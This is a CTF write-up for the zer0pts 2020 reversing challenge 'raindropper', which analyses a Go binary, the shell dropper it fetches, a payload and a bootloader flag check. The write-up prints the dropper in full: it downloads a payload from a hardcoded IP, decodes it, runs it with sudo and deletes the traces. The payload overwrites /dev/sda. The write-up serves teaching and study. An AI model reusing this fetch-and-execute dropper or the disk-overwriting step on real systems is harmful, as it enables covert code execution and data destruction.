# [zer0pts CTF 2020] raindropper ###### tags: `zer0pts CTF` `reversing` ## Overview We're given a 32-bit ELF. The binary is made by golang and completely stripped. Analysing this statically is hard, so let's run the binary on VM.  Nothing happens. \*You have to shut out your network when analysing a real malware! ## Analysing "malware" `strace` shows you that the binary is using socket. You can either capture the packet or search for IP address from the binary. ``` $ strings malware | grep -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' ...bodyhttp://13.230.161.88:8033/raindropillegal... ``` `http://13.230.161.88:8033/raindrop` is suspicious. You can download the script. ```bash #!/bin/bash if [ "$(whoami)" != "ImSureItsOnVM" ]; then echo "****** zer0pts CTF 2020 ******" echo "* *" echo "* You're not our target! *" echo "* *" echo "******************************" else wget -nv -O /tmp/.malchan http://13.230.161.88:8033/malchan 1> /dev/null 2> /dev/null cat /tmp/.malchan | base64 -d > /tmp/.malchan.bin 2> /dev/null chmod +x /tmp/.malchan.bin 2> /dev/null sudo /tmp/.malchan.bin 2> /dev/null rm -f /tmp/.malchan.bin 2> /dev/null rm -f /tmp/.malchan 2> /dev/null rm -f /tmp/.raindrop 2> /dev/null fi ``` Let's download `malchan` too. ## Analysing "malchan" `malchan` is a very small binary. You can understand what it does by statically analysing it. It just writes bootloader to `/dev/sda` only when run as root. You can unpack the bootloader with python script or whatever. ## Analysing bootloader The bootloader asks for user input and checks if it's correct. ```nasm check: xor dx, dx xor cx, cx mov si, password mov di, spaghetti mov cl, 0x29 .@Loop: lodsb add al, dl ror al, 1 mov dl, al scasb jnz .@Error loop .@Loop lodsb scasb jnz .@Error xor ax, ax ret .@Error: xor ax, ax inc al ret ``` We can easily decode the encoded flag.